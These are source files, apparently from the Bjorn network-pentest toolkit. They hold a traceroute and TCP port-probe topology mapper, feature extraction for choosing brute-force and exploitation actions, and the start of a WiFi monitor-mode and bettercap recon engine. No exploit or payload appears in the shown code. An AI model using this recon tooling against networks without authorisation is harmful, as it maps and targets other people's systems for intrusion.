b_tags = ["topology", "network", "recon", "mapping"]
b_category = "recon"
b_name = "Yggdrasil Mapper"
b_description = (
"Network topology mapper that discovers routing paths via traceroute, enriches "
"nodes with service data from the DB, and saves a merged JSON topology graph. "
"Lightweight -- no matplotlib or networkx required."
)
b_author = "Bjorn Team"
b_version = "2.0.0"
b_icon = "YggdrasilMapper.png"
b_args = {
"max_depth": {
"type": "slider",
"label": "Max trace depth (hops)",
"min": 5,
"max": 30,
"step": 1,
"default": 15,
"help": "Maximum number of hops for traceroute probes.",
},
"probe_timeout": {
"type": "slider",
"label": "Probe timeout (s)",
"min": 1,
"max": 5,
"step": 1,
"default": 2,
"help": "Timeout in seconds for each ICMP / TCP probe.",
},
}
b_examples = [
{"max_depth": 15, "probe_timeout": 2},
{"max_depth": 10, "probe_timeout": 1},
{"max_depth": 30, "probe_timeout": 3},
]
b_docs_url = "docs/actions/YggdrasilMapper.md"
# -------------------- Constants --------------------
_DATA_DIR = "/home/bjorn/Bjorn/data"
OUTPUT_DIR = os.path.join(_DATA_DIR, "output", "topology")
# Ports to verify during service enrichment (small set to stay Pi Zero friendly).
_VERIFY_PORTS = [22, 80, 443, 445, 3389, 8080]
# -------------------- Helpers --------------------
def _generate_mermaid_topology(topology: Dict[str, Any]) -> str:
"""Generate a Mermaid.js diagram string from topology data."""
lines = ["graph TD"]
# Define styles
lines.append(" classDef target fill:#f96,stroke:#333,stroke-width:2px;")
lines.append(" classDef router fill:#69f,stroke:#333,stroke-width:1px;")
lines.append(" classDef unknown fill:#ccc,stroke:#333,stroke-dasharray: 5 5;")
nodes = topology.get("nodes", {})
for node_id, node in nodes.items():
label = node.get("hostname") or node.get("ip")
node_type = node.get("type", "unknown")
        # Sanitize node id for Mermaid (labels are emitted quoted, so only ids need it)
        safe_id = node_id.replace(".", "_").replace("*", "unknown").replace("-", "_")
lines.append(f' {safe_id}["{label}"]')
if node_type == "target":
lines.append(f" class {safe_id} target")
elif node_type == "router":
lines.append(f" class {safe_id} router")
else:
lines.append(f" class {safe_id} unknown")
edges = topology.get("edges", [])
for edge in edges:
src = str(edge.get("source", "")).replace(".", "_").replace("*", "unknown").replace("-", "_")
dst = str(edge.get("target", "")).replace(".", "_").replace("*", "unknown").replace("-", "_")
if src and dst:
rtt = edge.get("rtt_ms", 0)
if rtt > 0:
lines.append(f" {src} -- {rtt}ms --> {dst}")
else:
lines.append(f" {src} --> {dst}")
return "\n".join(lines)
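The id sanitization above matters because Mermaid node ids cannot safely contain `.`, `*`, or `-`, while quoted labels can. A tiny standalone sketch of the same emit pattern (illustrative data, simplified styling):

```python
def mermaid_id(node_id):
    """Mirror of the id sanitization above."""
    return node_id.replace(".", "_").replace("*", "unknown").replace("-", "_")

lines = ["graph TD"]
for ip, label, kind in [("192.168.1.1", "gw.lan", "router"),
                        ("192.168.1.50", "192.168.1.50", "target")]:
    nid = mermaid_id(ip)
    lines.append(f'    {nid}["{label}"]')   # label keeps its dots inside quotes
    lines.append(f"    class {nid} {kind}")
lines.append(f'    {mermaid_id("192.168.1.1")} -- 5ms --> {mermaid_id("192.168.1.50")}')
print("\n".join(lines))
```

Pasting the printed text into any Mermaid renderer yields a two-node graph with the RTT as the edge label.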
def _reverse_dns(ip: str) -> str:
"""Best-effort reverse DNS lookup. Returns hostname or empty string."""
try:
hostname, _, _ = socket.gethostbyaddr(ip)
return hostname or ""
except Exception:
return ""
def _tcp_probe(ip: str, port: int, timeout_s: float) -> Tuple[bool, int]:
"""
Quick TCP connect probe. Returns (is_open, rtt_ms).
"""
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(timeout_s)
t0 = time.time()
try:
rc = s.connect_ex((ip, int(port)))
rtt_ms = int((time.time() - t0) * 1000)
return (rc == 0), rtt_ms
except Exception:
return False, 0
finally:
try:
s.close()
except Exception:
pass
def _scapy_traceroute(target: str, max_depth: int, timeout_s: float) -> List[Dict[str, Any]]:
"""
ICMP traceroute using scapy. Returns list of hop dicts:
[{"hop": 1, "ip": "x.x.x.x", "rtt_ms": 12}, ...]
"""
hops: List[Dict[str, Any]] = []
for ttl in range(1, max_depth + 1):
pkt = IP(dst=target, ttl=ttl) / ICMP()
t0 = time.time()
reply = sr1(pkt, timeout=timeout_s, verbose=0)
rtt_ms = int((time.time() - t0) * 1000)
if reply is None:
hops.append({"hop": ttl, "ip": "*", "rtt_ms": 0})
continue
src = reply.src
hops.append({"hop": ttl, "ip": src, "rtt_ms": rtt_ms})
# Reached destination
if src == target:
break
return hops
def _subprocess_traceroute(target: str, max_depth: int, timeout_s: float) -> List[Dict[str, Any]]:
"""
Fallback traceroute using the system `traceroute` command.
Works on Linux / macOS. On Windows falls back to `tracert`.
"""
import subprocess
import re
hops: List[Dict[str, Any]] = []
# Decide command based on platform
if os.name == "nt":
cmd = ["tracert", "-d", "-h", str(max_depth), "-w", str(int(timeout_s * 1000)), target]
else:
cmd = ["traceroute", "-n", "-m", str(max_depth), "-w", str(int(timeout_s)), target]
try:
proc = subprocess.run(
cmd,
capture_output=True,
text=True,
timeout=max_depth * timeout_s + 30,
)
output = proc.stdout or ""
except FileNotFoundError:
logger.error("traceroute/tracert command not found on this system")
return hops
except subprocess.TimeoutExpired:
logger.warning(f"Subprocess traceroute to {target} timed out")
return hops
except Exception as exc:
logger.error(f"Subprocess traceroute error: {exc}")
return hops
# Parse output lines
ip_pattern = re.compile(r'(\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})')
rtt_pattern = re.compile(r'(\d+(?:\.\d+)?)\s*ms')
hop_num = 0
for line in output.splitlines():
stripped = line.strip()
if not stripped:
continue
# Skip header lines
parts = stripped.split()
if not parts:
continue
# Try to extract hop number from first token
try:
hop_candidate = int(parts[0])
except (ValueError, IndexError):
continue
hop_num = hop_candidate
ip_match = ip_pattern.search(stripped)
rtt_match = rtt_pattern.search(stripped)
hop_ip = ip_match.group(1) if ip_match else "*"
hop_rtt = int(float(rtt_match.group(1))) if rtt_match else 0
hops.append({"hop": hop_num, "ip": hop_ip, "rtt_ms": hop_rtt})
# Stop if we reached the target
if hop_ip == target:
break
return hops
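The per-line parsing logic above can be isolated and tested against representative output. This standalone sketch mirrors the hop extraction (the sample lines imitate Linux `traceroute -n` output; real output varies by platform):

```python
import re

ip_re = re.compile(r"(\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})")
rtt_re = re.compile(r"(\d+(?:\.\d+)?)\s*ms")

def parse_hop(line):
    """Mirror of the loop body above: hop number, first IP, first RTT."""
    parts = line.strip().split()
    try:
        hop = int(parts[0])
    except (ValueError, IndexError):
        return None  # header or malformed line
    ip_m = ip_re.search(line)
    rtt_m = rtt_re.search(line)
    return {"hop": hop,
            "ip": ip_m.group(1) if ip_m else "*",
            "rtt_ms": int(float(rtt_m.group(1))) if rtt_m else 0}

print(parse_hop(" 1  192.168.1.1  1.234 ms  1.102 ms  1.045 ms"))
print(parse_hop("traceroute to 10.0.0.9 (10.0.0.9), 30 hops max"))  # header -> None
```

Requiring an integer first token is what quietly discards the `traceroute to ...` header and any wrapped continuation lines.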
def _load_existing_topology(output_dir: str) -> Dict[str, Any]:
"""
Load the most recent aggregated topology JSON from output_dir.
Returns an empty topology skeleton if nothing exists yet.
"""
skeleton: Dict[str, Any] = {
"version": b_version,
"nodes": {},
"edges": [],
"metadata": {
"created": datetime.utcnow().isoformat() + "Z",
"updated": datetime.utcnow().isoformat() + "Z",
"run_count": 0,
},
}
if not os.path.isdir(output_dir):
return skeleton
# Find the latest aggregated file
candidates = []
try:
for fname in os.listdir(output_dir):
if fname.startswith("topology_aggregate") and fname.endswith(".json"):
fpath = os.path.join(output_dir, fname)
candidates.append((os.path.getmtime(fpath), fpath))
except Exception:
return skeleton
if not candidates:
return skeleton
candidates.sort(reverse=True)
latest_path = candidates[0][1]
try:
with open(latest_path, "r", encoding="utf-8") as fh:
data = json.load(fh)
if isinstance(data, dict) and "nodes" in data:
return data
except Exception as exc:
logger.warning(f"Failed to load existing topology ({latest_path}): {exc}")
return skeleton
def _merge_node(existing: Dict[str, Any], new: Dict[str, Any]) -> Dict[str, Any]:
"""Merge two node dicts, preferring newer / non-empty values."""
merged = dict(existing)
for key, val in new.items():
if val is None or val == "" or val == []:
continue
if key == "open_ports":
# Union of port lists
old_ports = set(merged.get("open_ports") or [])
old_ports.update(val if isinstance(val, list) else [])
merged["open_ports"] = sorted(old_ports)
elif key == "rtt_ms":
# Keep lowest non-zero RTT
old_rtt = merged.get("rtt_ms") or 0
new_rtt = val or 0
if old_rtt == 0:
merged["rtt_ms"] = new_rtt
elif new_rtt > 0:
merged["rtt_ms"] = min(old_rtt, new_rtt)
else:
merged[key] = val
merged["last_seen"] = datetime.utcnow().isoformat() + "Z"
return merged
def _edge_key(src: str, dst: str) -> str:
"""Canonical edge key (sorted to avoid duplicates)."""
a, b = sorted([src, dst])
return f"{a}--{b}"
# -------------------- Main Action Class --------------------
class YggdrasilMapper:
def __init__(self, shared_data):
self.shared_data = shared_data
# ---- Phase 1: Traceroute ----
def _phase_traceroute(
self,
ip: str,
max_depth: int,
probe_timeout: float,
progress: ProgressTracker,
total_steps: int,
) -> List[Dict[str, Any]]:
"""Run traceroute to target. Returns list of hop dicts."""
logger.info(f"Phase 1: Traceroute to {ip} (max_depth={max_depth})")
if _SCAPY_AVAILABLE:
hops = _scapy_traceroute(ip, max_depth, probe_timeout)
else:
hops = _subprocess_traceroute(ip, max_depth, probe_timeout)
# Progress: phase 1 is 0-30% (weight = 30% of total_steps)
phase1_steps = max(1, int(total_steps * 0.30))
progress.advance(phase1_steps)
logger.info(f"Traceroute to {ip}: {len(hops)} hop(s) discovered")
return hops
# ---- Phase 2: Service Enrichment ----
def _phase_enrich(
self,
ip: str,
mac: str,
row: Dict[str, Any],
probe_timeout: float,
progress: ProgressTracker,
total_steps: int,
) -> Dict[str, Any]:
"""
Enrich the target node with port / service data from the DB and
optional TCP connect probes.
"""
logger.info(f"Phase 2: Service enrichment for {ip}")
node_info: Dict[str, Any] = {
"ip": ip,
"mac": mac,
"hostname": "",
"open_ports": [],
"verified_ports": {},
"vendor": "",
}
# Read hostname
hostname = (row.get("Hostname") or row.get("hostname") or row.get("hostnames") or "").strip()
if ";" in hostname:
hostname = hostname.split(";", 1)[0].strip()
if not hostname:
hostname = _reverse_dns(ip)
node_info["hostname"] = hostname
# Query DB for known ports to prioritize probing
db_ports = []
host_data = None  # Initialized up front: referenced later even if the query raises
try:
host_data = self.shared_data.db.get_host_by_mac(mac)
if host_data and host_data.get("ports"):
# Normalize ports from DB string
db_ports = [int(p) for p in str(host_data["ports"]).split(";") if p.strip().isdigit()]
except Exception as e:
logger.debug(f"Failed to query DB for host ports: {e}")
# Fallback to defaults if DB is empty
if not db_ports:
# Read existing ports from DB row (compatibility)
ports_txt = str(row.get("Ports") or row.get("ports") or "")
for p in ports_txt.split(";"):
p = p.strip()
if p.isdigit():
db_ports.append(int(p))
node_info["open_ports"] = sorted(set(db_ports))
# Vendor and OS guessing
vendor = str(row.get("Vendor") or row.get("vendor") or "").strip()
if not vendor and host_data:
vendor = host_data.get("vendor", "")
node_info["vendor"] = vendor
# OS guessing is out of scope for this action; store what we already have.
# Verify a small set of key ports via TCP connect
verified: Dict[str, Dict[str, Any]] = {}
# Prioritize ports found in the DB, then pad with common ports (cap at 10)
probe_candidates = (sorted(set(db_ports)) + [p for p in _VERIFY_PORTS if p not in db_ports])[:10]
for port in probe_candidates:
if self.shared_data.orchestrator_should_exit:
break
is_open, rtt = _tcp_probe(ip, port, probe_timeout)
if is_open:
verified[str(port)] = {"open": is_open, "rtt_ms": rtt}
# Update node_info open_ports if we found a new one
if port not in node_info["open_ports"]:
node_info["open_ports"].append(port)
node_info["open_ports"].sort()
node_info["verified_ports"] = verified
# Progress: phase 2 is 30-60%
phase2_steps = max(1, int(total_steps * 0.30))
progress.advance(phase2_steps)
self.shared_data.log_milestone(b_class, "Enrichment", f"Discovered {len(node_info['open_ports'])} ports for {ip}")
return node_info
# ---- Phase 3: Build Topology ----
def _phase_build_topology(
self,
ip: str,
hops: List[Dict[str, Any]],
target_node: Dict[str, Any],
progress: ProgressTracker,
total_steps: int,
) -> Tuple[Dict[str, Dict[str, Any]], List[Dict[str, Any]]]:
"""
Build nodes dict and edges list from traceroute hops and target enrichment.
"""
logger.info(f"Phase 3: Building topology graph for {ip}")
nodes: Dict[str, Dict[str, Any]] = {}
edges: List[Dict[str, Any]] = []
# Add target node
nodes[ip] = {
"ip": ip,
"type": "target",
"hostname": target_node.get("hostname", ""),
"mac": target_node.get("mac", ""),
"vendor": target_node.get("vendor", ""),
"open_ports": target_node.get("open_ports", []),
"verified_ports": target_node.get("verified_ports", {}),
"rtt_ms": 0,
"first_seen": datetime.utcnow().isoformat() + "Z",
"last_seen": datetime.utcnow().isoformat() + "Z",
}
# Add hop nodes and edges
prev_ip: Optional[str] = None
for hop in hops:
hop_ip = hop.get("ip", "*")
hop_rtt = hop.get("rtt_ms", 0)
hop_num = hop.get("hop", 0)
if hop_ip == "*":
# Unknown hop -- still create a placeholder node
placeholder = f"*_hop{hop_num}"
nodes[placeholder] = {
"ip": placeholder,
"type": "unknown_hop",
"hostname": "",
"mac": "",
"vendor": "",
"open_ports": [],
"verified_ports": {},
"rtt_ms": 0,
"hop_number": hop_num,
"first_seen": datetime.utcnow().isoformat() + "Z",
"last_seen": datetime.utcnow().isoformat() + "Z",
}
if prev_ip is not None:
edges.append({
"source": prev_ip,
"target": placeholder,
"hop": hop_num,
"rtt_ms": hop_rtt,
"discovered": datetime.utcnow().isoformat() + "Z",
})
prev_ip = placeholder
continue
# Real hop IP
if hop_ip not in nodes:
hop_hostname = _reverse_dns(hop_ip)
nodes[hop_ip] = {
"ip": hop_ip,
"type": "router" if hop_ip != ip else "target",
"hostname": hop_hostname,
"mac": "",
"vendor": "",
"open_ports": [],
"verified_ports": {},
"rtt_ms": hop_rtt,
"hop_number": hop_num,
"first_seen": datetime.utcnow().isoformat() + "Z",
"last_seen": datetime.utcnow().isoformat() + "Z",
}
else:
# Update RTT if this hop is lower
existing_rtt = nodes[hop_ip].get("rtt_ms") or 0
if existing_rtt == 0 or (hop_rtt > 0 and hop_rtt < existing_rtt):
nodes[hop_ip]["rtt_ms"] = hop_rtt
if prev_ip is not None:
edges.append({
"source": prev_ip,
"target": hop_ip,
"hop": hop_num,
"rtt_ms": hop_rtt,
"discovered": datetime.utcnow().isoformat() + "Z",
})
prev_ip = hop_ip
# Progress: phase 3 is 60-80% (weight = 20% of total_steps)
phase3_steps = max(1, int(total_steps * 0.20))
progress.advance(phase3_steps)
logger.info(f"Topology for {ip}: {len(nodes)} node(s), {len(edges)} edge(s)")
return nodes, edges
# ---- Phase 4: Aggregate ----
def _phase_aggregate(
self,
new_nodes: Dict[str, Dict[str, Any]],
new_edges: List[Dict[str, Any]],
progress: ProgressTracker,
total_steps: int,
) -> Dict[str, Any]:
"""
Merge new topology data with previous runs.
"""
logger.info("Phase 4: Aggregating topology data")
topology = _load_existing_topology(OUTPUT_DIR)
# Merge nodes
existing_nodes = topology.get("nodes") or {}
if not isinstance(existing_nodes, dict):
existing_nodes = {}
for node_id, node_data in new_nodes.items():
if node_id in existing_nodes:
existing_nodes[node_id] = _merge_node(existing_nodes[node_id], node_data)
else:
existing_nodes[node_id] = node_data
topology["nodes"] = existing_nodes
# Merge edges (deduplicate by canonical key)
existing_edges = topology.get("edges") or []
if not isinstance(existing_edges, list):
existing_edges = []
seen_keys: set = set()
merged_edges: List[Dict[str, Any]] = []
for edge in existing_edges:
ek = _edge_key(str(edge.get("source", "")), str(edge.get("target", "")))
if ek not in seen_keys:
seen_keys.add(ek)
merged_edges.append(edge)
for edge in new_edges:
ek = _edge_key(str(edge.get("source", "")), str(edge.get("target", "")))
if ek not in seen_keys:
seen_keys.add(ek)
merged_edges.append(edge)
topology["edges"] = merged_edges
# Update metadata
meta = topology.get("metadata") or {}
meta["updated"] = datetime.utcnow().isoformat() + "Z"
meta["run_count"] = int(meta.get("run_count") or 0) + 1
meta["node_count"] = len(existing_nodes)
meta["edge_count"] = len(merged_edges)
topology["metadata"] = meta
topology["version"] = b_version
# Progress: phase 4 is 80-95% (weight = 15% of total_steps)
phase4_steps = max(1, int(total_steps * 0.15))
progress.advance(phase4_steps)
logger.info(
f"Aggregated topology: {meta['node_count']} node(s), "
f"{meta['edge_count']} edge(s), run #{meta['run_count']}"
)
return topology
# ---- Phase 5: Save ----
def _phase_save(
self,
topology: Dict[str, Any],
ip: str,
progress: ProgressTracker,
total_steps: int,
) -> str:
"""
Save topology JSON to disk. Returns the file path written.
"""
logger.info("Phase 5: Saving topology data")
os.makedirs(OUTPUT_DIR, exist_ok=True)
timestamp = datetime.utcnow().strftime("%Y-%m-%dT%H-%M-%SZ")
# Per-target snapshot
snapshot_name = f"topology_{ip.replace('.', '_')}_{timestamp}.json"
snapshot_path = os.path.join(OUTPUT_DIR, snapshot_name)
# Aggregated file (timestamped; _load_existing_topology picks the most recent)
aggregate_name = f"topology_aggregate_{timestamp}.json"
aggregate_path = os.path.join(OUTPUT_DIR, aggregate_name)
try:
with open(snapshot_path, "w", encoding="utf-8") as fh:
json.dump(topology, fh, indent=2, ensure_ascii=True, default=str)
logger.info(f"Snapshot saved: {snapshot_path}")
except Exception as exc:
logger.error(f"Failed to write snapshot {snapshot_path}: {exc}")
try:
with open(aggregate_path, "w", encoding="utf-8") as fh:
json.dump(topology, fh, indent=2, ensure_ascii=True, default=str)
logger.info(f"Aggregate saved: {aggregate_path}")
except Exception as exc:
logger.error(f"Failed to write aggregate {aggregate_path}: {exc}")
# Save Mermaid diagram
mermaid_path = os.path.join(OUTPUT_DIR, f"topology_{ip.replace('.', '_')}_{timestamp}.mermaid")
try:
mermaid_str = _generate_mermaid_topology(topology)
with open(mermaid_path, "w", encoding="utf-8") as fh:
fh.write(mermaid_str)
logger.info(f"Mermaid topology saved: {mermaid_path}")
except Exception as exc:
logger.error(f"Failed to write Mermaid topology: {exc}")
# Progress: phase 5 is 95-100% (weight = 5% of total_steps)
phase5_steps = max(1, int(total_steps * 0.05))
progress.advance(phase5_steps)
self.shared_data.log_milestone(b_class, "Save", f"Topology saved for {ip}")
return aggregate_path
# ---- Main execute ----
def execute(self, ip, port, row, status_key) -> str:
"""
Orchestrator entry point. Maps topology for a single target host.
Returns:
'success' -- topology data written successfully.
'failed' -- an error prevented meaningful output.
'interrupted' -- orchestrator requested early exit.
"""
if self.shared_data.orchestrator_should_exit:
return "interrupted"
# --- Identity cache from DB row ---
mac = (
row.get("MAC Address")
or row.get("mac_address")
or row.get("mac")
or ""
).strip()
hostname = (
row.get("Hostname")
or row.get("hostname")
or row.get("hostnames")
or ""
).strip()
if ";" in hostname:
hostname = hostname.split(";", 1)[0].strip()
# --- Configurable arguments ---
max_depth = int(getattr(self.shared_data, "yggdrasil_max_depth", 15))
probe_timeout = float(getattr(self.shared_data, "yggdrasil_probe_timeout", 2.0))
# Clamp to sane ranges
max_depth = max(5, min(max_depth, 30))
probe_timeout = max(1.0, min(probe_timeout, 5.0))
# --- UI status ---
self.shared_data.bjorn_orch_status = "yggdrasil_mapper"
self.shared_data.bjorn_status_text2 = f"{ip}"
self.shared_data.comment_params = {"ip": ip, "mac": mac, "phase": "init"}
# Total steps for progress (arbitrary units; phases will consume proportional slices)
total_steps = 100
progress = ProgressTracker(self.shared_data, total_steps)
try:
# ---- Phase 1: Traceroute (0-30%) ----
if self.shared_data.orchestrator_should_exit:
return "interrupted"
self.shared_data.log_milestone(b_class, "Traceroute", f"Running trace to {ip}")
hops = self._phase_traceroute(ip, max_depth, probe_timeout, progress, total_steps)
# ---- Phase 2: Service Enrichment (30-60%) ----
if self.shared_data.orchestrator_should_exit:
return "interrupted"
self.shared_data.comment_params = {"ip": ip, "phase": "enrich"}
target_node = self._phase_enrich(ip, mac, row, probe_timeout, progress, total_steps)
# ---- Phase 3: Build Topology (60-80%) ----
if self.shared_data.orchestrator_should_exit:
return "interrupted"
self.shared_data.comment_params = {"ip": ip, "phase": "topology"}
new_nodes, new_edges = self._phase_build_topology(
ip, hops, target_node, progress, total_steps
)
# ---- Phase 4: Aggregate (80-95%) ----
if self.shared_data.orchestrator_should_exit:
return "interrupted"
self.shared_data.comment_params = {"ip": ip, "phase": "aggregate"}
topology = self._phase_aggregate(new_nodes, new_edges, progress, total_steps)
# ---- Phase 5: Save (95-100%) ----
if self.shared_data.orchestrator_should_exit:
return "interrupted"
self.shared_data.comment_params = {"ip": ip, "phase": "save"}
saved_path = self._phase_save(topology, ip, progress, total_steps)
# Final UI update
node_count = len(topology.get("nodes") or {})
edge_count = len(topology.get("edges") or [])
hop_count = len([h for h in hops if h.get("ip") != "*"])
self.shared_data.comment_params = {
"ip": ip,
"hops": str(hop_count),
"nodes": str(node_count),
"edges": str(edge_count),
"file": os.path.basename(saved_path),
}
progress.set_complete()
logger.info(
f"YggdrasilMapper complete for {ip}: "
f"{hop_count} hops, {node_count} nodes, {edge_count} edges"
)
return "success"
except Exception as exc:
logger.error(f"YggdrasilMapper failed for {ip}: {exc}", exc_info=True)
self.shared_data.comment_params = {"ip": ip, "error": str(exc)[:120]}
return "failed"
finally:
self.shared_data.bjorn_progress = ""
self.shared_data.comment_params = {}
self.shared_data.bjorn_status_text2 = ""
# -------------------- Optional CLI (debug / manual) --------------------
if __name__ == "__main__":
import argparse
from shared import SharedData
parser = argparse.ArgumentParser(description="YggdrasilMapper (network topology mapper)")
parser.add_argument("--ip", required=True, help="Target IP to trace")
parser.add_argument("--max-depth", type=int, default=15, help="Max traceroute depth")
parser.add_argument("--timeout", type=float, default=2.0, help="Probe timeout in seconds")
args = parser.parse_args()
sd = SharedData()
# Push CLI args into shared_data so execute() picks them up
sd.yggdrasil_max_depth = args.max_depth
sd.yggdrasil_probe_timeout = args.timeout
mapper = YggdrasilMapper(sd)
row = {
"MAC Address": getattr(sd, "get_raspberry_mac", lambda: "__GLOBAL__")() or "__GLOBAL__",
"Hostname": "",
"Ports": "",
}
result = mapper.execute(args.ip, None, row, "yggdrasil_mapper")
print(f"Result: {result}")
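The aggregation helpers above (`_edge_key`, `_merge_node`) can be exercised standalone. A minimal sketch re-implementing the canonical-key and port-union logic (function names here are illustrative, not part of the module):

```python
from typing import Any, Dict, List

def edge_key(src: str, dst: str) -> str:
    # Direction-independent key: sorted endpoints, as in _edge_key.
    a, b = sorted([src, dst])
    return f"{a}--{b}"

def merge_ports(existing: Dict[str, Any], new: Dict[str, Any]) -> List[int]:
    # Union of open_ports, mirroring _merge_node's "open_ports" branch.
    ports = set(existing.get("open_ports") or [])
    ports.update(new.get("open_ports") or [])
    return sorted(ports)

# A->B and B->A collapse to one undirected edge in the aggregate.
assert edge_key("10.0.0.2", "10.0.0.1") == "10.0.0.1--10.0.0.2"
print(merge_ports({"open_ports": [22, 80]}, {"open_ports": [80, 443]}))  # prints [22, 80, 443]
```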

1121
ai_engine.py Normal file

File diff suppressed because it is too large

99
ai_utils.py Normal file

@@ -0,0 +1,99 @@
"""
ai_utils.py - Shared AI utilities for Bjorn
"""
import json
import numpy as np
from typing import Dict, List, Any, Optional
def extract_neural_features_dict(host_features: Dict[str, Any], network_features: Dict[str, Any], temporal_features: Dict[str, Any], action_features: Dict[str, Any]) -> Dict[str, float]:
"""
Extracts all available features as a named dictionary.
This allows the model to select exactly what it needs by name.
"""
f = {}
# 1. Host numericals
f['host_port_count'] = float(host_features.get('port_count', 0))
f['host_service_count'] = float(host_features.get('service_count', 0))
f['host_ip_count'] = float(host_features.get('ip_count', 0))
f['host_credential_count'] = float(host_features.get('credential_count', 0))
f['host_age_hours'] = float(host_features.get('age_hours', 0))
# 2. Host Booleans
f['has_ssh'] = 1.0 if host_features.get('has_ssh') else 0.0
f['has_http'] = 1.0 if host_features.get('has_http') else 0.0
f['has_https'] = 1.0 if host_features.get('has_https') else 0.0
f['has_smb'] = 1.0 if host_features.get('has_smb') else 0.0
f['has_rdp'] = 1.0 if host_features.get('has_rdp') else 0.0
f['has_database'] = 1.0 if host_features.get('has_database') else 0.0
f['has_credentials'] = 1.0 if host_features.get('has_credentials') else 0.0
f['is_new'] = 1.0 if host_features.get('is_new') else 0.0
f['is_private'] = 1.0 if host_features.get('is_private') else 0.0
f['has_multiple_ips'] = 1.0 if host_features.get('has_multiple_ips') else 0.0
# 3. Vendor Category (One-Hot)
vendor_cats = ['networking', 'iot', 'nas', 'compute', 'virtualization', 'mobile', 'other', 'unknown']
current_vendor = host_features.get('vendor_category', 'unknown')
for cat in vendor_cats:
f[f'vendor_is_{cat}'] = 1.0 if cat == current_vendor else 0.0
# 4. Port Profile (One-Hot)
port_profiles = ['camera', 'web_server', 'nas', 'database', 'linux_server',
'windows_server', 'printer', 'router', 'generic', 'unknown']
current_profile = host_features.get('port_profile', 'unknown')
for prof in port_profiles:
f[f'profile_is_{prof}'] = 1.0 if prof == current_profile else 0.0
# 5. Network Stats
f['net_total_hosts'] = float(network_features.get('total_hosts', 0))
f['net_subnet_count'] = float(network_features.get('subnet_count', 0))
f['net_similar_vendor_count'] = float(network_features.get('similar_vendor_count', 0))
f['net_similar_port_profile_count'] = float(network_features.get('similar_port_profile_count', 0))
f['net_active_host_ratio'] = float(network_features.get('active_host_ratio', 0.0))
# 6. Temporal features
f['time_hour'] = float(temporal_features.get('hour_of_day', 0))
f['time_day'] = float(temporal_features.get('day_of_week', 0))
f['is_weekend'] = 1.0 if temporal_features.get('is_weekend') else 0.0
f['is_night'] = 1.0 if temporal_features.get('is_night') else 0.0
f['hist_action_count'] = float(temporal_features.get('previous_action_count', 0))
f['hist_seconds_since_last'] = float(temporal_features.get('seconds_since_last', 0))
f['hist_success_rate'] = float(temporal_features.get('historical_success_rate', 0.0))
f['hist_same_attempts'] = float(temporal_features.get('same_action_attempts', 0))
f['is_retry'] = 1.0 if temporal_features.get('is_retry') else 0.0
f['global_success_rate'] = float(temporal_features.get('global_success_rate', 0.0))
f['hours_since_discovery'] = float(temporal_features.get('hours_since_discovery', 0))
# 7. Action Info
action_types = ['bruteforce', 'enumeration', 'exploitation', 'extraction', 'other']
current_type = action_features.get('action_type', 'other')
for atype in action_types:
f[f'action_is_{atype}'] = 1.0 if atype == current_type else 0.0
f['action_target_port'] = float(action_features.get('target_port', 0))
f['action_is_standard_port'] = 1.0 if action_features.get('is_standard_port') else 0.0
return f
def extract_neural_features(host_features: Dict[str, Any], network_features: Dict[str, Any], temporal_features: Dict[str, Any], action_features: Dict[str, Any]) -> List[float]:
"""
Deprecated: Hardcoded list. Use extract_neural_features_dict for evolution.
Kept for backward compatibility during transition.
"""
d = extract_neural_features_dict(host_features, network_features, temporal_features, action_features)
# Return as a list in a fixed order (the one previously used)
# This is fragile and will be replaced by manifest-based extraction.
return list(d.values())
def get_system_mac() -> str:
"""
Get the persistent MAC address of the device.
Used for unique identification in Swarm mode.
"""
try:
import uuid
mac = uuid.getnode()
return ':'.join(('%012X' % mac)[i:i+2] for i in range(0, 12, 2))
except Exception:
return "00:00:00:00:00:00"
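The manifest-based extraction anticipated by the deprecation note in `extract_neural_features` could look like this sketch; the `manifest` contents are hypothetical, and missing names default to 0.0 so older models stay loadable:

```python
from typing import Dict, List

def features_to_vector(features: Dict[str, float], manifest: List[str]) -> List[float]:
    # Project the named feature dict onto a fixed, versioned ordering.
    return [float(features.get(name, 0.0)) for name in manifest]

manifest = ["host_port_count", "has_ssh", "action_is_bruteforce"]  # hypothetical
vec = features_to_vector({"has_ssh": 1.0, "host_port_count": 3.0}, manifest)
print(vec)  # prints [3.0, 1.0, 0.0]
```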

585
bifrost/__init__.py Normal file

@@ -0,0 +1,585 @@
"""
Bifrost — Pwnagotchi-compatible WiFi recon engine for Bjorn.
Runs as a daemon thread alongside MANUAL/AUTO/AI modes.
"""
import os
import time
import subprocess
import threading
import logging
from logger import Logger
logger = Logger(name="bifrost", level=logging.DEBUG)
class BifrostEngine:
"""Main Bifrost lifecycle manager.
Manages the bettercap subprocess and BifrostAgent daemon loop.
Pattern follows SentinelEngine (sentinel.py).
"""
def __init__(self, shared_data):
self.shared_data = shared_data
self._thread = None
self._stop_event = threading.Event()
self._running = False
self._bettercap_proc = None
self._monitor_torn_down = False
self._monitor_failed = False
self.agent = None
@property
def enabled(self):
return bool(self.shared_data.config.get('bifrost_enabled', False))
def start(self):
"""Start the Bifrost engine (bettercap + agent loop)."""
if self._running:
logger.warning("Bifrost already running")
return
# Wait for any previous thread to finish before re-starting
if self._thread and self._thread.is_alive():
logger.warning("Previous Bifrost thread still running — waiting ...")
self._stop_event.set()
self._thread.join(timeout=15)
logger.info("Starting Bifrost engine ...")
self._stop_event.clear()
self._running = True
self._monitor_failed = False
self._monitor_torn_down = False
self._thread = threading.Thread(
target=self._loop, daemon=True, name="BifrostEngine"
)
self._thread.start()
def stop(self):
"""Stop the Bifrost engine gracefully.
Signals the daemon loop to exit, then waits for it to finish.
The loop's finally block handles bettercap shutdown and monitor teardown.
"""
if not self._running:
return
logger.info("Stopping Bifrost engine ...")
self._stop_event.set()
self._running = False
if self._thread and self._thread.is_alive():
self._thread.join(timeout=15)
self._thread = None
self.agent = None
# Safety net: teardown is idempotent, so this is a no-op if
# _loop()'s finally already ran it.
self._stop_bettercap()
self._teardown_monitor_mode()
logger.info("Bifrost engine stopped")
def _loop(self):
"""Main daemon loop — setup monitor mode, start bettercap, create agent, run recon cycle."""
try:
# Install compatibility shim for pwnagotchi plugins
from bifrost import plugins as bfplugins
from bifrost.compat import install_shim
install_shim(self.shared_data, bfplugins)
# Setup monitor mode on the WiFi interface
self._setup_monitor_mode()
if self._monitor_failed:
logger.error(
"Monitor mode setup failed — Bifrost cannot operate without monitor "
